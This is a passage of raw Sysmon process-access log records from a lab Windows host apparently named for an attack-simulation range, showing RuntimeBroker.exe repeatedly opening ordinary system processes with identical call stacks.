l+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7 10341000x800000000000000011933Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:34.367{59A5CD1D-93F9-6005-F104-00000000A301}45404264C:\Windows\System32\RuntimeBroker.exe{59A5CD1D-9409-6005-0B05-00000000A301}5428C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x3200C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\deviceaccess.dll+2da89|C:\Windows\System32\deviceaccess.dll+1713b|C:\Windows\System32\deviceaccess.dll+17524|C:\Windows\System32\deviceaccess.dll+17485|C:\Windows\System32\deviceaccess.dll+18249|C:\Windows\System32\deviceaccess.dll+17fd6|C:\Windows\system32\windows.cortana.onecore.dll+bb0f|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+277f|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7 10341000x800000000000000011932Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:34.367{59A5CD1D-93F9-6005-F104-00000000A301}45404264C:\Windows\System32\RuntimeBroker.exe{59A5CD1D-9407-6005-0A05-00000000A301}5312C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x3200C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\deviceaccess.dll+2da89|C:\Windows\System32\deviceaccess.dll+1713b|C:\Windows\System32\deviceaccess.dll+17524|C:\Windows\System32\deviceaccess.dll+17485|C:\Windows\System32\deviceaccess.dll+18249|C:\Windows\System32\deviceaccess.dll+17fd6|C:\Windows\system32\windows.cortana.onecore.dll+bb0f|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+277f|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7 10341000x800000000000000011931Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:34.367{59A5CD1D-93F9-6005-F104-00000000A301}45404264C:\Windows\System32\RuntimeBroker.exe{59A5CD1D-9407-6005-0905-00000000A301}4240C:\Windows\system32\DllHost.exe0x3200C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\deviceaccess.dll+2da89|C:\Windows\System32\deviceaccess.dll+1713b|C:\Windows\System32\deviceaccess.dll+17524|C:\Windows\System32\deviceaccess.dll+17485|C:\Windows\System32\deviceaccess.dll+18249|C:\Windows\System32\deviceaccess.dll+17fd6|C:\Windows\system32\windows.cortana.onecore.dll+bb0f|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+277f|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7 10341000x800000000000000011930Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:34.367{59A5CD1D-93F9-6005-F104-00000000A301}45404264C:\Windows\System32\RuntimeBroker.exe{59A5CD1D-93FF-6005-0105-00000000A301}2792C:\Windows\System32\ie4uinit.exe0x3200C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\deviceaccess.dll+2da89|C:\Windows\System32\deviceaccess.dll+1713b|C:\Windows\System32\deviceaccess.dll+17524|C:\Windows\System32\deviceaccess.dll+17485|C:\Windows\System32\deviceaccess.dll+18249|C:\Windows\System32\deviceaccess.dll+17fd6|C:\Windows\system32\windows.cortana.onecore.dll+bb0f|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+277f|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7 10341000x800000000000000011929Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:34.367{59A5CD1D-93F9-6005-F104-00000000A301}45404264C:\Windows\System32\RuntimeBroker.exe{59A5CD1D-93FD-6005-FF04-00000000A301}2584C:\Windows\system32\rundll32.exe0x3200C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\deviceaccess.dll+2da89|C:\Windows\System32\deviceaccess.dll+1713b|C:\Windows\System32\deviceaccess.dll+17524|C:\Windows\System32\deviceaccess.dll+17485|C:\Windows\System32\deviceaccess.dll+18249|C:\Windows\System32\deviceaccess.dll+17fd6|C:\Windows\system32\windows.cortana.onecore.dll+bb0f|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+277f|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7 10341000x800000000000000011928Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:34.367{59A5CD1D-93F9-6005-F104-00000000A301}45404264C:\Windows\System32\RuntimeBroker.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x3200C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\deviceaccess.dll+2da89|C:\Windows\System32\deviceaccess.dll+1713b|C:\Windows\System32\deviceaccess.dll+17524|C:\Windows\System32\deviceaccess.dll+17485|C:\Windows\System32\deviceaccess.dll+18249|C:\Windows\System32\deviceaccess.dll+17fd6|C:\Windows\system32\windows.cortana.onecore.dll+bb0f|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+277f|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7 10341000x800000000000000011927Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:34.367{59A5CD1D-93F9-6005-F104-00000000A301}45404264C:\Windows\System32\RuntimeBroker.exe{59A5CD1D-93FA-6005-F904-00000000A301}2860C:\Windows\system32\userinit.exe0x3200C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\deviceaccess.dll+2da89|C:\Windows\System32\deviceaccess.dll+1713b|C:\Windows\System32\deviceaccess.dll+17524|C:\Windows\System32\deviceaccess.dll+17485|C:\Windows\System32\deviceaccess.dll+18249|C:\Windows\System32\deviceaccess.dll+17fd6|C:\Windows\system32\windows.cortana.onecore.dll+bb0f|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+277f|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7 10341000x800000000000000011926Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:34.367{59A5CD1D-93F9-6005-F104-00000000A301}45404264C:\Windows\System32\RuntimeBroker.exe{59A5CD1D-93F9-6005-F304-00000000A301}5116C:\Windows\system32\svchost.exe0x3200C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\deviceaccess.dll+2da89|C:\Windows\System32\deviceaccess.dll+1713b|C:\Windows\System32\deviceaccess.dll+17524|C:\Windows\System32\deviceaccess.dll+17485|C:\Windows\System32\deviceaccess.dll+18249|C:\Windows\System32\deviceaccess.dll+17fd6|C:\Windows\system32\windows.cortana.onecore.dll+bb0f|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+277f|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7 10341000x800000000000000011925Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:34.367{59A5CD1D-93F9-6005-F104-00000000A301}45404264C:\Windows\System32\RuntimeBroker.exe{59A5CD1D-93F9-6005-F004-00000000A301}3900C:\Windows\System32\rdpclip.exe0x3200C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\deviceaccess.dll+2da89|C:\Windows\System32\deviceaccess.dll+1713b|C:\Windows\System32\deviceaccess.dll+17524|C:\Windows\System32\deviceaccess.dll+17485|C:\Windows\System32\deviceaccess.dll+18249|C:\Windows\System32\deviceaccess.dll+17fd6|C:\Windows\system32\windows.cortana.onecore.dll+bb0f|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+277f|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7 10341000x800000000000000011924Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:34.367{59A5CD1D-93F9-6005-F104-00000000A301}45404264C:\Windows\System32\RuntimeBroker.exe{59A5CD1D-8E6E-6005-7D00-00000000A301}4172C:\Windows\system32\conhost.exe0x3200C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\deviceaccess.dll+2da89|C:\Windows\System32\deviceaccess.dll+1713b|C:\Windows\System32\deviceaccess.dll+17524|C:\Windows\System32\deviceaccess.dll+17485|C:\Windows\System32\deviceaccess.dll+18249|C:\Windows\System32\deviceaccess.dll+17fd6|C:\Windows\system32\windows.cortana.onecore.dll+bb0f|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+277f|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7 10341000x800000000000000011923Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:34.367{59A5CD1D-93F9-6005-F104-00000000A301}45404264C:\Windows\System32\RuntimeBroker.exe{59A5CD1D-8E6E-6005-7C00-00000000A301}4152C:\Windows\system32\WinrsHost.exe0x3200C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\deviceaccess.dll+2da89|C:\Windows\System32\deviceaccess.dll+1713b|C:\Windows\System32\deviceaccess.dll+17524|C:\Windows\System32\deviceaccess.dll+17485|C:\Windows\System32\deviceaccess.dll+18249|C:\Windows\System32\deviceaccess.dll+17fd6|C:\Windows\system32\windows.cortana.onecore.dll+bb0f|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+277f|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7 10341000x800000000000000011922Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:34.367{59A5CD1D-93F9-6005-F104-00000000A301}45404264C:\Windows\System32\RuntimeBroker.exe{59A5CD1D-9409-6005-0B05-00000000A301}5428C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x3200C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\deviceaccess.dll+2da89|C:\Windows\System32\deviceaccess.dll+1713b|C:\Windows\System32\deviceaccess.dll+17524|C:\Windows\System32\deviceaccess.dll+17485|C:\Windows\System32\deviceaccess.dll+18249|C:\Windows\System32\deviceaccess.dll+17fd6|C:\Windows\system32\windows.cortana.onecore.dll+bb0f|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+277f|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7 10341000x800000000000000011921Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:34.367{59A5CD1D-93F9-6005-F104-00000000A301}45404264C:\Windows\System32\RuntimeBroker.exe{59A5CD1D-9407-6005-0A05-00000000A301}5312C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x3200C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\deviceaccess.dll+2da89|C:\Windows\System32\deviceaccess.dll+1713b|C:\Windows\System32\deviceaccess.dll+17524|C:\Windows\System32\deviceaccess.dll+17485|C:\Windows\System32\deviceaccess.dll+18249|C:\Windows\System32\deviceaccess.dll+17fd6|C:\Windows\system32\windows.cortana.onecore.dll+bb0f|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+277f|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7 10341000x800000000000000011920Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:34.367{59A5CD1D-93F9-6005-F104-00000000A301}45404264C:\Windows\System32\RuntimeBroker.exe{59A5CD1D-9407-6005-0905-00000000A301}4240C:\Windows\system32\DllHost.exe0x3200C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\deviceaccess.dll+2da89|C:\Windows\System32\deviceaccess.dll+1713b|C:\Windows\System32\deviceaccess.dll+17524|C:\Windows\System32\deviceaccess.dll+17485|C:\Windows\System32\deviceaccess.dll+18249|C:\Windows\System32\deviceaccess.dll+17fd6|C:\Windows\system32\windows.cortana.onecore.dll+bb0f|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+277f|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7 10341000x800000000000000011919Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:34.367{59A5CD1D-93F9-6005-F104-00000000A301}45404264C:\Windows\System32\RuntimeBroker.exe{59A5CD1D-93FF-6005-0105-00000000A301}2792C:\Windows\System32\ie4uinit.exe0x3200C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\deviceaccess.dll+2da89|C:\Windows\System32\deviceaccess.dll+1713b|C:\Windows\System32\deviceaccess.dll+17524|C:\Windows\System32\deviceaccess.dll+17485|C:\Windows\System32\deviceaccess.dll+18249|C:\Windows\System32\deviceaccess.dll+17fd6|C:\Windows\system32\windows.cortana.onecore.dll+bb0f|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+277f|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7 10341000x800000000000000011918Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:34.367{59A5CD1D-93F9-6005-F104-00000000A301}45404264C:\Windows\System32\RuntimeBroker.exe{59A5CD1D-93FD-6005-FF04-00000000A301}2584C:\Windows\system32\rundll32.exe0x3200C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\deviceaccess.dll+2da89|C:\Windows\System32\deviceaccess.dll+1713b|C:\Windows\System32\deviceaccess.dll+17524|C:\Windows\System32\deviceaccess.dll+17485|C:\Windows\System32\deviceaccess.dll+18249|C:\Windows\System32\deviceaccess.dll+17fd6|C:\Windows\system32\windows.cortana.onecore.dll+bb0f|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+277f|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7 10341000x800000000000000011917Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:34.367{59A5CD1D-93F9-6005-F104-00000000A301}45404264C:\Windows\System32\RuntimeBroker.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x3200C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\deviceaccess.dll+2da89|C:\Windows\System32\deviceaccess.dll+1713b|C:\Windows\System32\deviceaccess.dll+17524|C:\Windows\System32\deviceaccess.dll+17485|C:\Windows\System32\deviceaccess.dll+18249|C:\Windows\System32\deviceaccess.dll+17fd6|C:\Windows\system32\windows.cortana.onecore.dll+bb0f|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+277f|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7 10341000x800000000000000011916Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:34.367{59A5CD1D-93F9-6005-F104-00000000A301}45404264C:\Windows\System32\RuntimeBroker.exe{59A5CD1D-93FA-6005-F904-00000000A301}2860C:\Windows\system32\userinit.exe0x3200C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\deviceaccess.dll+2da89|C:\Windows\System32\deviceaccess.dll+1713b|C:\Windows\System32\deviceaccess.dll+17524|C:\Windows\System32\deviceaccess.dll+17485|C:\Windows\System32\deviceaccess.dll+18249|C:\Windows\System32\deviceaccess.dll+17fd6|C:\Windows\system32\windows.cortana.onecore.dll+bb0f|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+277f|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7 10341000x800000000000000011915Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:34.367{59A5CD1D-93F9-6005-F104-00000000A301}45404264C:\Windows\System32\RuntimeBroker.exe{59A5CD1D-93F9-6005-F304-00000000A301}5116C:\Windows\system32\svchost.exe0x3200C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\deviceaccess.dll+2da89|C:\Windows\System32\deviceaccess.dll+1713b|C:\Windows\System32\deviceaccess.dll+17524|C:\Windows\System32\deviceaccess.dll+17485|C:\Windows\System32\deviceaccess.dll+18249|C:\Windows\System32\deviceaccess.dll+17fd6|C:\Windows\system32\windows.cortana.onecore.dll+bb0f|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+277f|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7 10341000x800000000000000011914Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:34.367{59A5CD1D-93F9-6005-F104-00000000A301}45404264C:\Windows\System32\RuntimeBroker.exe{59A5CD1D-93F9-6005-F004-00000000A301}3900C:\Windows\System32\rdpclip.exe0x3200C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\deviceaccess.dll+2da89|C:\Windows\System32\deviceaccess.dll+1713b|C:\Windows\System32\deviceaccess.dll+17524|C:\Windows\System32\deviceaccess.dll+17485|C:\Windows\System32\deviceaccess.dll+18249|C:\Windows\System32\deviceaccess.dll+17fd6|C:\Windows\system32\windows.cortana.onecore.dll+bb0f|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+277f|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7 10341000x800000000000000011913Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 